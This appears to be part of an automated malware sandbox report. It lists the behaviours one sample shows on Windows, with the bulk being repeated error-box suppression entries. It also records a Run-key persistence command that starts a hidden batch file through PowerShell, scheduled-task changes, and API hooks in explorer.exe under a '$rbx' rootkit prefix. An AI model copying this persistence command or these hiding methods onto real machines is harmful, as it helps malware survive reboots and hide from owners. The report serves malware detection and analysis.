Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C1DA push ds; retf 36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C1A0 push eax; retf 36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C91F push ds; retf 36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C09F push eax; retf 36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E8A7DD push rcx; retf 003Fh37_3_0000026504E8A7DE
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1AAA7DD push rcx; retf 003Fh38_3_0000025DC1AAA7DE
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC62A7DD push rcx; retf 003Fh39_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0ACA7DD push rcx; retf 003Fh40_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612EA7DD push rcx; retf 003Fh41_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDCA7DD push rcx; retf 003Fh42_3_000002BAAEDCA7DE
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED9A7DD push rcx; retf 003Fh42_3_000002BAAED9A7DE
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A879AA7DD push rcx; retf 003Fh43_3_0000026A879AA7DE
Source: C:\Windows\System32\svchost.exeCode function: 44_3_000001795378A7DD push rcx; retf 003Fh44_3_000001795378A7DE
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E3A7DD push rcx; retf 003Fh45_3_0000016CE5E3A7DE
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D54A7DD push rcx; retf 003Fh46_3_000002295D54A7DE

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
